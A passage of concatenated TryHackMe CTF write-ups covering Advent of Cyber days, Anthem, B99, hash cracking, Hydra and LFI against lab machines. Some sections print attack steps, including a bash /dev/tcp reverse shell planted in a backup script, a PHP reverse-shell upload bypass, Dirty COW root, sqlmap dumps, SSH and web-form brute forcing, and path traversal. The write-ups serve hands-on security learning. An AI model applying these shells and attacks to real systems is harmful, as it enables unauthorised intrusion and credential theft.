| tput civis 44 | lin=2 45 | col=$(($(tput cols) / 2)) 46 | c=$((col-1)) 47 | est=$((c-2)) 48 | color=0 49 | tput setaf 2; tput bold 50 | 51 | # Tree 52 | for ((i=1; i<20; i+=2)) 53 | { 54 | tput cup $lin $col 55 | for ((j=1; j<=i; j++)) 56 | { 57 | echo -n \* 58 | } 59 | let lin++ 60 | let col-- 61 | } 62 | 63 | tput sgr0; tput setaf 3 64 | 65 | # Trunk 66 | for ((i=1; i<=2; i++)) 67 | { 68 | tput cup $((lin++)) $c 69 | echo "mWm" 70 | } 71 | new_year=$(date +"%Y") 72 | let new_year++ 73 | tput setaf 1; tput bold 74 | tput cup $lin $((c - 6)); echo " TryHackMe" 75 | tput cup $((lin + 1)) $((c - 10)); echo " Advent of Cyber with John Hammond" 76 | let c++ 77 | k=1 78 | 79 | # Lights and decorations 80 | while true; do 81 | for ((i=1; i<=35; i++)) { 82 | # Turn off the lights 83 | [ $k -gt 1 ] && { 84 | tput setaf 2; tput bold 85 | tput cup ${line[$[k-1]$i]} ${column[$[k-1]$i]}; echo \* 86 | unset line[$[k-1]$i]; unset column[$[k-1]$i] # Array cleanup 87 | } 88 | 89 | li=$((RANDOM % 9 + 3)) 90 | start=$((c-li+2)) 91 | co=$((RANDOM % (li-2) * 2 + 1 + start)) 92 | tput setaf $color; tput bold # Switch colors 93 | tput cup $li $co 94 | echo o 95 | line[$k$i]=$li 96 | column[$k$i]=$co 97 | color=$(((color+1)%8)) 98 | # Flashing text 99 | sh=1 100 | for l in C y b e r 101 | do 102 | tput cup $((lin+1)) $((c+sh)) 103 | echo $l 104 | let sh++ 105 | sleep 0.01 106 | done 107 | } 108 | k=$((k % 2 + 1)) 109 | done$ 110 | ``` 111 | # dirty cow!! 112 | follow the instructed in dirty.c. Compile the exploit, run it **BUT LEAVE THE PASSWORD EMPTY**. Telnet to the server again with new tab, and run `su firefart` 113 | ```console 114 | $ su firefart 115 | Password: 116 | firefart@christmas:/home/santa# whoami 117 | firefart 118 | firefart@christmas:/home/santa# id 119 | uid=0(firefart) gid=0(root) groups=0(root) 120 | firefart@christmas:/home/santa# 121 | ``` 122 | seem like GRINCH left a message to us. let will it 123 | ```console 124 | firefart@christmas:/home/santa# ls /root 125 | christmas.sh message_from_the_grinch.txt 126 | firefart@christmas:/home/santa# cat /root message_from_the_grinch.txt 127 | cat: /root: Is a directory 128 | cat: message_from_the_grinch.txt: No such file or directory 129 | firefart@christmas:/home/santa# cat /root/message_from_the_grinch.txt 130 | Nice work, Santa! 131 | 132 | Wow, this house sure was DIRTY! 133 | I think they deserve coal for Christmas, don't you? 134 | So let's leave some coal under the Christmas `tree`! 135 | 136 | Let's work together on this. Leave this text file here, 137 | and leave the christmas.sh script here too... 138 | but, create a file named `coal` in this directory! 139 | Then, inside this directory, pipe the output 140 | of the `tree` command into the `md5sum` command. 141 | 142 | The output of that command (the hash itself) is 143 | the flag you can submit to complete this task 144 | for the Advent of Cyber! 145 | 146 | - Yours, 147 | John Hammond 148 | er, sorry, I mean, the Grinch 149 | 150 | - THE GRINCH, SERIOUSLY 151 | ``` 152 | message from GRINCH (John) tell us how to get the last flag, so let create a file call coal using `touch`. to get the flag we run `tree` at `/root` and pipe it to `md5sum` 153 | ``` 154 | firefart@christmas:/home/santa# cd /root 155 | firefart@christmas:~# touch coal 156 | firefart@christmas:~# tree | md5sum 157 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day14.md: -------------------------------------------------------------------------------- 1 | 1. google `site:reddit.com IGuidetheClaus2020` 2 | 2. creator, google `rudolph the red nosed reindeer` 3 | - parade? download the image and image.google to search for it 4 | - location 5 | - using `exiftool` but cannot find anything 6 | - back to twitter and I find another picture with high resolution https://tcm-sec.com/wp-content/uploads/2020/11/lights-festival-website.jpg 7 | - use `exiftool` or http://exif.regex.info/exif.cgi 8 | - password, using `https://scylla.sh/api` and search for his password that you found on his twitter 9 | - hotel, search the geolocation that you get from exiftool, look for a hotel closes to the location picture was taken -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day2.md: -------------------------------------------------------------------------------- 1 | 2 | to sign in visit:`?id=ODIzODI5MTNiYmYw` 3 | 4 | from src code 5 | ```html 6 | 7 | ``` 8 | I then uploaded some picture, sadly it doesn't show where the images is save. I tried to us gobuster but the browser always return the main page even tho the requested page doesn't exits. I then need to try one by one, luckily I hit the correct directory at the first try `/uploads` 9 | 10 | 11 | prepare 2 reverse shell, you can find php reverse shell by running `find / -name php-reverse* 2> /dev/null`. I changed the name and make it more cute :P. We know that the site only accept `.jpeg,.jpg,.png` by studying the src page. 12 | 13 | 14 | now let change the name of the file and include .png our reverse shell. since this page is poorly implemented, this should be enough to by pass it. 15 | ```console 16 | ┌──(kali㉿kali)-[~/THM/adventofcyber/2] 17 | └─$ cp cutiecat.php cutiecat.png.php 18 | ``` 19 | Dont forget to change IP + Port in the script before upload it. Open `nc` and listen/wait for incoming reverse shell then visit `/upload/cutiecat.png.php` to execute our shell!! 20 | 21 | 22 | Boom 23 | ``` 24 | nc -nlvp 6969 1 ⨯ 25 | listening on [any] 6969 ... 26 | connect to [10.8.14.151] from (UNKNOWN) [10.10.122.94] 40866 27 | Linux security-server 4.18.0-193.28.1.el8_2.x86_64 #1 SMP Thu Oct 22 00:20:22 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 28 | 17:32:13 up 20 min, 0 users, load average: 0.00, 0.13, 0.45 29 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 30 | uid=48(apache) gid=48(apache) groups=48(apache) 31 | sh: cannot set terminal process group (818): Inappropriate ioctl for device 32 | sh: no job control in this shell 33 | sh-4.4$ 34 | ``` 35 | let go grab the flag 36 | ``` 37 | sh-4.4$ cat flag.txt 38 | cat flag.txt 39 | 40 | 41 | ============================================================== 42 | 43 | 44 | You've reached the end of the Advent of Cyber, Day 2 -- hopefully you're enjoying yourself so far, and are learning lots! 45 | This is all from me, so I'm going to take the chance to thank the awesome @Vargnaar for his invaluable design lessons, without which the theming of the past two websites simply would not be the same. 46 | 47 | 48 | Have a flag -- you deserve it! 49 | THM{MGU3Y2UyMGUwNj___________} 50 | 51 | 52 | Good luck on your mission (and maybe I'll see y'all again on Christmas Eve)! 53 | --Muiri (@MuirlandOracle) 54 | 55 | 56 | ============================================================== 57 | ``` 58 | cya tomorrow, GL happy hacking!! -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day3.md: -------------------------------------------------------------------------------- 1 | `admin:12345` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day4.md: -------------------------------------------------------------------------------- 1 | 1. `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ` 2 | 3 | on `/api` you will find `site-log.php`, download the wordlist given by THM to your kali 4 | ```console 5 | $ wc -l wordlist 6 | 63 wordlist 7 | ``` 8 | 63 lines, not bad, it will go really fast. now use wfuzz to fuzz different param 9 | ```console 10 | $ wfuzz -c -z file,wordlist http://10.10.148.58/api/site-log.php?date=FUZZ 11 | 12 | =================================================================== 13 | ID Response Lines Word Chars Payload 14 | =================================================================== 15 | . 16 | 000000001: 200 0 L 0 W 0 Ch "20201100" 17 | . 18 | . 19 | 000000026: 200 0 L 1 W 13 Ch "20201125" 20 | . 21 | . 22 | . 23 | ``` 24 | most of the response return 0 char. note that `20201125` returned 13 char!! so let check it out by visit `http://10.10.148.58/api/site-log.php?date=20201125` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day5.md: -------------------------------------------------------------------------------- 1 | /s**tap***l 2 | /santapanel 3 | 4 | 5 | 6 | ```console 7 | $ sqlmap -r day5 --tamper=space2comment 8 | . 9 | . 10 | 11 | [07:46:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests 12 | ``` 13 | let add --level=5 14 | ```console 15 | $ sqlmap -r day5 --tamper=space2comment --level 5 16 | . 17 | . 18 | [07:48:20] [INFO] testing 'Generic inline queries' 19 | [07:48:20] [INFO] testing 'SQLite inline queries' 20 | [07:48:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)' 21 | [07:48:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)' 22 | [07:48:21] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)' 23 | [07:48:41] [INFO] GET parameter 'search' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable 24 | ``` 25 | yeah something is happening here :D, now just wait and wait for the scan is done. 26 | 27 | 28 | the next goal is dump the database. SQLite is running as dbms, we dont need to run `sqlmap --dbs` since SQLite dont have databases, **only tables**. 29 | ```console 30 | └─$ sqlmap -r day5 --tamper=space2comment --level 5 --threads 10 --tables 31 | . 32 | . 33 | Database: SQLite_masterdb 34 | [3 tables] 35 | +--------------+ 36 | | hidden_table | 37 | | sequels | 38 | | users | 39 | +--------------+ 40 | ``` 41 | `hidden_table` looks interesting, let dump it! 42 | ```console 43 | $ sqlmap -r day5 --tamper=space2comment --level 5 --threads 10 -T 'hidden_table' --dump 44 | . 45 | . 46 | . 47 | [08:02:13] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb' 48 | Database: SQLite_masterdb 49 | Table: hidden_table 50 | [1 entry] 51 | +-----------------------------------------+ 52 | | flag | 53 | +-----------------------------------------+ 54 | | thmfox{All____________________________} | 55 | +-----------------------------------------+ 56 | ``` 57 | 58 | to find admin password -> dump `users` table 59 | ```console 60 | $ sqlmap -r day5 --tamper=space2comment --level 5 --threads 10 -T 'users' --dump 61 | . 62 | . 63 | . 64 | [08:05:24] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb' 65 | Database: SQLite_masterdb 66 | Table: users 67 | [1 entry] 68 | +------------------+----------+ 69 | | password | username | 70 | +------------------+----------+ 71 | | EhCNSWzzFP6sc7gB | admin | 72 | +------------------+----------+ 73 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day7.md: -------------------------------------------------------------------------------- 1 | # pcap1.pcap 2 | To search for icmp packets, type `icmp` in search bar. `http.request.method == GET` can be use to search for **HTTP GET request**. 3 | 4 | 5 | for the 3rd task I ran `http.request.method == GET and ip.src == 10.10.67.199` filtering only HTTP get request from 10.10.67.199. where I find `/posts` which I assume that it directory for articles 6 | 7 | # pcap2.pcap 8 | filter only `ftp` traffic and find `elfmcskidy` password (wrong password) 9 | 10 | # pcap3.pcap 11 | I notice that there is a http traffic after analyzing the pcap. We learned how to import files from pcap by File -> explort file -> HTTP since we want to export data from http traffic. Here you will find `christmas.zip`, export it and extract the zip. You will find `elf_mcskidy_wishlist.txt` check the content of the file :D 12 | -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day8.md: -------------------------------------------------------------------------------- 1 | use my tool call pymap.py and run `sudo python3 pymap.py -t ` will give you all output you need to solve the task. -------------------------------------------------------------------------------- /TryHackMe/Easy/AdventOfCyber2/Day9.md: -------------------------------------------------------------------------------- 1 | connect to ftp server and with `anonymous` account and get files 2 | ```console 3 | ┌──(kali㉿kali)-[~/THM/adventofcyber/9] 4 | └─$ cat shoppinglist.txt 5 | The Polar Express Movie 6 | 7 | ┌──(kali㉿kali)-[~/THM/adventofcyber/9] 8 | └─$ cat backup.sh 9 | #!/bin/bash 10 | 11 | # Created by ElfMcEager to backup all of Santa's goodies! 12 | 13 | # Create backups to include date DD/MM/YYYY 14 | filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz"; 15 | 16 | # Backup FTP folder and store in elfmceager's home directory 17 | tar -zcvf /home/elfmceager/$filename /opt/ftp 18 | 19 | # TO-DO: Automate transfer of backups to backup server 20 | ``` 21 | in general, backup is execute automatically after some period of time. so let try to put new backup.sh to the ftp server that contain a reverse shell 22 | ```console 23 | └─$ cat backup.sh 24 | #!/bin/bash 25 | bash -i >& /dev/tcp//6969 0>&1 26 | ``` 27 | now open nc and wait for reverse shell 28 | ```console 29 | $ nc -nlvp 6969 30 | listening on [any] 6969 ... 31 | connect to [10.8.14.151] from (UNKNOWN) [10.10.120.20] 60378 32 | bash: cannot set terminal process group (1732): Inappropriate ioctl for device 33 | bash: no job control in this shell 34 | root@tbfc-ftp-01:~# ls 35 | ls 36 | flag.txt 37 | root@tbfc-ftp-01:~# cat flag.txt 38 | cat flag.txt 39 | THM{______________________} 40 | ``` 41 | -------------------------------------------------------------------------------- /TryHackMe/Easy/Anthem.md: -------------------------------------------------------------------------------- 1 | ## nmap 2 | ``` 3 | PORT STATE SERVICE VERSION 4 | 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 5 | | http-robots.txt: 4 disallowed entries 6 | |_/bin/ /config/ /umbraco/ /umbraco_client/ 7 | |_http-title: Anthem.com - Welcome to our blog 8 | 135/tcp open msrpc Microsoft Windows RPC 9 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 10 | 445/tcp open microsoft-ds? 11 | 3389/tcp open ms-wbt-server Microsoft Terminal Services 12 | | rdp-ntlm-info: 13 | | Target_Name: WIN-LU09299160F 14 | | NetBIOS_Domain_Name: WIN-LU09299160F 15 | | NetBIOS_Computer_Name: WIN-LU09299160F 16 | | DNS_Domain_Name: WIN-LU09299160F 17 | | DNS_Computer_Name: WIN-LU09299160F 18 | | Product_Version: 10.0.17763 19 | |_ System_Time: 2020-08-01T11:44:11+00:00 20 | | ssl-cert: Subject: commonName=WIN-LU09299160F 21 | | Not valid before: 2020-04-04T22:56:38 22 | |_Not valid after: 2020-10-04T22:56:38 23 | |_ssl-date: 2020-08-01T11:44:19+00:00; +1s from scanner time. 24 | ``` 25 | ## task 1 web recon 26 | - Jane Doe : JD@anthem.com 27 | - /SiteMap 28 | - /archive/ 29 | - /archive/we-are-hiring/ 30 | - /archive/a-cheers-to-our-it-department/ 31 | - /authors/ 32 | - /authors/jane-doe/ 33 | - robots.txt 34 | ``` 35 | 36 | 37 | # Use for all search robots 38 | User-agent: * 39 | 40 | # Define the directories not to crawl 41 | Disallow: /bin/ 42 | Disallow: /config/ 43 | Disallow: /umbraco/ 44 | Disallow: /umbraco_client/ 45 | ``` 46 | - domain : Anthem.com. (on the web header & footer) 47 | - /archive/a-cheers-to-our-it-department/: info about admin 48 | ``` 49 | As we all around here knows how much I love writing poems I decided to write one about him: 50 | 51 | Born on a Monday, 52 | Christened on Tuesday, 53 | Married on Wednesday, 54 | Took ill on Thursday, 55 | Grew worse on Friday, 56 | Died on Saturday, 57 | Buried on Sunday. 58 | That was the end… 59 | ``` 60 | wanna know admin's name? google his name. 61 | - admin email? Jane Doe has JD@anthem.com as his/her email, what can admin have? (XX@anthem.com) 62 | 63 | # task 2: flags 64 | 1. metadata tag 65 | 2. view src 66 | 3. auther 67 | 4. metadata tag 68 | 69 | # task 3: 70 | we know that the server run remote desktop (RDP) service (port 3389). Moreover, we have user credential which we can remote login to the server. I'm using [Remmina](https://remmina.org/). Now filled in server ip, username, password, and lastly domain which we got from nmap scan. see figure below: 71 | ![rdp](pic/Screenshot%202020-08-01%20at%2016.16.24.png) 72 | now press save and connect!! BOOM! we are in, grab user flag on the desktop. 73 | 74 | before we enumerate the server, let start with fixing `File Explorer` so that we can see hidden file: how to do that? 75 | ![hidden](https://msegceporticoprodassets.blob.core.windows.net/inline-media/e84efe1a-ea59-4b5b-a19e-773ad9cbef3c-en) 76 | 77 | now look aroud, you will find a interesting file in `C:` note that you cannot read the .txt file coz we dont have premission. The funny part is we are able to edit the premission. Add the `SG` to the permission list as the figure belows: 78 | ![permision](pic/Screenshot%202020-08-01%20at%2017.25.20.png) 79 | 80 | Voilà ! it seem like it is a admin password. you can RDP to the server using Administrator as username to gain root OR. spawn a shell as root user, which a simple cmd that I found [here](https://superuser.com/questions/617732/running-programs-as-root-in-non-root-shell-powershell) 81 | 82 | here is what I did, 83 | ![root](pic/Screenshot%202020-08-01%20at%2016.27.25.png) 84 | -------------------------------------------------------------------------------- /TryHackMe/Easy/B99.md: -------------------------------------------------------------------------------- 1 | # what I learned 2 | - nothing... 3 | # enumerating 4 | - 21/tcp open ftp 5 | ``` 6 | ftp-anon: Anonymous FTP login allowed (FTP code 230) 7 | |_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt 8 | ``` 9 | the file contains 10 | ```console 11 | kali@kali:~/THM/B99$ cat note_to_jake.txt 12 | From Amy, 13 | 14 | Jake please change your password. It is too weak and holt will be mad if someone hacks into the nin nine 15 | ``` 16 | - 22/tcp open ssh 17 | - 80/tcp open http 18 | - Apache/2.4.29 (Ubuntu) 19 | - a stegano picture? 20 | # foothold 21 | ```console 22 | jake@brookly_nine_nine:~$ sudo -l 23 | Matching Defaults entries for jake on brookly_nine_nine: 24 | env_reset, mail_badpass, 25 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 26 | 27 | User jake may run the following commands on brookly_nine_nine: 28 | (ALL) NOPASSWD: /usr/bin/less 29 | ``` 30 | https://gtfobins.github.io/gtfobins/less/ 31 | 32 | ```console 33 | jake@brookly_nine_nine:~$ less /home/amy/. 34 | ./ .bash_logout .cache/ .profile 35 | ../ .bashrc .gnupg/ .ssh/ 36 | jake@brookly_nine_nine:~$ less /home/holt/ 37 | .bash_history .bashrc .gnupg/ .profile nano.save 38 | .bash_logout .cache/ .local/ .ssh/ user.txt 39 | jake@brookly_nine_nine:~$ less /home/holt/user.txt 40 | ``` 41 | * amy 42 | ``` 43 | -----BEGIN RSA PRIVATE KEY----- 44 | Proc-Type: 4,ENCRYPTED 45 | DEK-Info: AES-128-CBC,8A45EF5CE95F44B523FBD6AEEAD2B9E6 46 | 47 | //MOmD5ttJ6rTXqLiBtvOmCcXLWmgexGwQZc2sy6P9mVlh9nUD2g2gN/SwyOIOzo 48 | pWBjAatk7qpqwbsGDstQsKErCDGCH/qjF49zG1meMNbzxFQAT5vOxGM/0oYJwD9F 49 | BKeRcOqY0vKjiJz0Wf9ZA3+CF3xdjNvVhneGe3BE1jEX2J3+sGZ0qiNLkYn6Mw+h 50 | p0TrrdkFQiDR5X+rbfL+EgFYCwOanABkK+FzptbXB0ABte7L+PSICvZKsCn/yo6z 51 | fxraAZ0nJejWQEYEH99o7T7uHkR+CZSD8gWPBsaP8pfPJSeKR9LzXG3MOWGc+5/p 52 | gZBPQI5EwbUaWtnwEKqzTqT1G/+iYps8ExqUGj9lZWPnwNAEnWXiKJfTZF2lJyqz 53 | -----END RSA PRIVATE KEY----- 54 | ``` 55 | **jake1** 56 | 57 | * holt 58 | ``` 59 | -----BEGIN RSA PRIVATE KEY----- 60 | Proc-Type: 4,ENCRYPTED 61 | DEK-Info: AES-128-CBC,7FEB01DFD04064BFFC03CBB293CEF0F9 62 | 8rta3aQd8iUsjaUJ7S+j4wUbMhIGhWaSFOwuyDvKOfTEuFpNSv5DkA/p6D7qcBIE 63 | eApPx3ASu2agU8IRvq0Z6IuWw1rvprmiXyBWCQ9NBOjIo4dnL6cLE+UmVmQThxst 64 | hnxQNnTVZlFLdM5mJjNyzCyfsdvyu5QxsDfEtTCLBH3P8ittfeSWv1WlF0b6nkUO 65 | -----END RSA PRIVATE KEY----- 66 | ``` 67 | **kevin** 68 | 69 | ```console 70 | kali@kali:~/THM/B99$ nano holt.txt 71 | kali@kali:~/THM/B99$ sudo /usr/share/john/ssh2john.py holt.txt > holt-for-john.txt 72 | kali@kali:~/THM/B99$ sudo /usr/share/john/ssh2john.py amy.txt > amy-for-john.txt 73 | root@kali:~# john /home/kali/THM/B99/holt-for-john.txt -wordlist=/usr/share/wordlists/rockyou.txt # holt 74 | root@kali:~# john /home/kali/THM/B99/amy-for-john.txt -wordlist=/usr/share/wordlists/rockyou.txt # amy 75 | kali@kali:~/THM/B99$ openssl rsa -in amy.txt -out amy_id_rsa 76 | kali@kali:~/THM/B99$ openssl rsa -in holt.txt -out holt_id_rsa 77 | ``` 78 | but fuq... didnt works, 79 | 80 | # root 81 | ```console 82 | jake@brookly_nine_nine:~$ less /root/root.txt 83 | ``` 84 | 85 | # PS 86 | - There are two main intended ways to root the box. 87 | - I only solved 1 -------------------------------------------------------------------------------- /TryHackMe/Easy/CrackTheHash.md: -------------------------------------------------------------------------------- 1 | link to [read](https://hashcat.net/wiki/doku.php?id=example_hashes). and [this](https://hkh4cks.com/blog/2018/02/05/password-cracking-tools/#hashcat) 2 | 3 | # Task 1 4 | Can you complete the level 1 tasks by cracking the hashes? 5 | 6 | 7 | find out what XXX stand for!! GL 8 | 1. ```hashcat -m XXX -a 0 -o task.txt "48bb6e862e54f2a795ffc4e541caed4d" /usr/share/wordlists/rockyou.txt --force``` 9 | 2. sha1 10 | 3. sha256 11 | 4. kill me, it will take me 11 to crake this 12 | 5. https://md5decrypt.net/en/Md4/ 13 | 6. 14 | 15 | # Task 2 16 | 17 | 1. ```hashcat -m 1400 -a 0 -o task.txt "F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85" /usr/share/wordlists/rockyou.txt --force``` 18 | 2. ```hashcat -m 1000 -a 0 -o task.txt "1DFECA0C002AE40B8619ECF94819CC1B" /usr/share/wordlists/rockyou.txt --force``` 19 | 3. dothis 20 | ```console 21 | $ ehco "$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02." > unix.hash 22 | $ hashcat -m 1800 -a 0 -o task.txt unix.lst wordlist/rockyou.txt --force --self-test-disable #took like 1 hr 23 | ``` 24 | 4. ```hashcat -m 160 -a 0 -o task.txt "e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme" /usr/share/wordlists/rockyou.txt --force``` 25 | 26 | ```console 27 | hashcat -m 3200 -a 0 -o crack.txt '$2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG' /usr/share/wordlists/rockyou.txt --force 28 | 1800 29 | $6$GQXVvW4EuM$ehD6jWiMsfNorxy5SINsgdlxmAEl3.yif0/c3NqzGLa0P.S7KRDYjycw5bnYkF5ZtB8wQy8KnskuWQS3Yr1wQ0 30 | hashcat -m 1800 -a 0 -o crack.txt '$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/' /usr/share/wordlists/rockyou.txt --force 31 | ``` 32 | 33 | 34 | $6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/ -------------------------------------------------------------------------------- /TryHackMe/Easy/Hydra.md: -------------------------------------------------------------------------------- 1 | # Hydra Commands 2 | 3 | The options we pass into Hydra depends on which service (protocol) we're attacking. For example if we wanted to bruteforce FTP with the username being user and a password list being passlist.txt, we'd use the following command: 4 | 5 | ```hydra -l user -P passlist.txt ftp://192.168.0.1``` 6 | 7 | For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method). 8 | ## SSH 9 | 10 | ```hydra -l -P -t 4 ssh``` 11 | [-h](https://i.imgur.com/D71vkKM.png) 12 | 13 | ```console 14 | kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.39.3 -t 4 ssh 15 | Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). 16 | 17 | Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 12:51:58 18 | [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task 19 | [DATA] attacking ssh://10.10.39.3:22/ 20 | [22][ssh] host: 10.10.39.3 login: molly password: butterfly 21 | 1 of 1 target successfully completed, 1 valid password found 22 | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 12:52:51 23 | kali@kali:~$ ssh molly@10.10.39.3 24 | The authenticity of host '10.10.39.3 (10.10.39.3)' can't be established. 25 | ECDSA key fingerprint is SHA256:CvZ/M3lLX1Nv/BtNNW9Cb+JYa2z85ldNGQdNp0HwQ9U. 26 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 27 | Warning: Permanently added '10.10.39.3' (ECDSA) to the list of known hosts. 28 | molly@10.10.39.3's password: 29 | Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64) 30 | 31 | * Documentation: https://help.ubuntu.com 32 | * Management: https://landscape.canonical.com 33 | * Support: https://ubuntu.com/advantage 34 | 35 | 65 packages can be updated. 36 | 32 updates are security updates. 37 | 38 | 39 | Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98 40 | molly@ip-10-10-39-3:~$ ls 41 | flag2.txt 42 | molly@ip-10-10-39-3:~$ cat flag2.txt 43 | THM{c8eeb0468febbadea859baeb33b2541b} 44 | ``` 45 | flag = ```THM{c8eeb0468febbadea859baeb33b2541b}``` 46 | 47 | 48 | ## Post Web Form 49 | 50 | We can use Hydra to bruteforce web forms too, you will have to make sure you know which type of request its making - a GET or POST methods are normally used. You can use your browsers network tab (in developer tools) to see the request types, of simply view the source code. 51 | 52 | Below is an example Hydra command to brute force a POST login form: 53 | 54 | ```hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V``` 55 | 56 | - [-h](https://i.imgur.com/vC3ZU4E.png) 57 | - [check this to understand how to use it](https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/) 58 | 59 | 60 | 61 | ```console 62 | kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.39.3 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." 63 | Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). 64 | 65 | Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 13:09:26 66 | [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task 67 | [DATA] attacking http-post-form://10.10.39.3:80/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect. 68 | [80][http-post-form] host: 10.10.39.3 login: molly password: sunshine 69 | 1 of 1 target successfully completed, 1 valid password found 70 | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 13:09:29 71 | ``` 72 | ```html 73 | 74 | 75 |
76 |

THM{2673a7dd116de68e85c48ec0b1f2612e}

77 |
78 | 79 | 80 | 81 | 82 | 83 | ``` 84 | 85 | flag = ```THM{2673a7dd116de68e85c48ec0b1f2612e}``` -------------------------------------------------------------------------------- /TryHackMe/Easy/Inclusion.md: -------------------------------------------------------------------------------- 1 | # Local File Inclusion (LFI) 2 | [LFI](https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/) 3 | 4 | # nmap 5 | ```console 6 | kali@kali:~$ sudo python3 pymap.py -t 10.10.14.166 7 | created by gu2rks/kurohat 8 | find me here https://github.com/gu2rks 9 | 10 | port scanning... 11 | 22/tcp open ssh 12 | 80/tcp open http 13 | Enumerating open ports... 14 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 09:05 EDT 15 | Nmap scan report for 10.10.14.166 16 | Host is up (0.044s latency). 17 | 18 | PORT STATE SERVICE VERSION 19 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 20 | | ssh-hostkey: 21 | | 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA) 22 | | 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA) 23 | |_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519) 24 | 80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9) 25 | |_http-server-header: Werkzeug/0.16.0 Python/3.6.9 26 | |_http-title: My blog 27 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 28 | Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%) 29 | No exact OS matches for host (test conditions non-ideal). 30 | Network Distance: 2 hops 31 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 32 | 33 | TRACEROUTE (using port 80/tcp) 34 | HOP RTT ADDRESS 35 | 1 43.17 ms 10.8.0.1 36 | 2 43.17 ms 10.10.14.166 37 | 38 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 39 | Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds 40 | ``` 41 | 42 | # foothold 43 | - hacking http://10.10.14.166/article?name=hacking 44 | - LFI http://10.10.14.166/article?name=lfiattack 45 | - Remote File Inclusion (RFI) http://10.10.14.166/article?name=rfiattack 46 | 47 | seem like LFI is here ```http://10.10.14.166/article?name=``` let try out by request for `/etc/passwd`. 48 | 49 | 50 | ```http://10.10.14.166/article?name=../../../../../../../etc/passwd```. BINGO !! 51 | ``` 52 | root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin 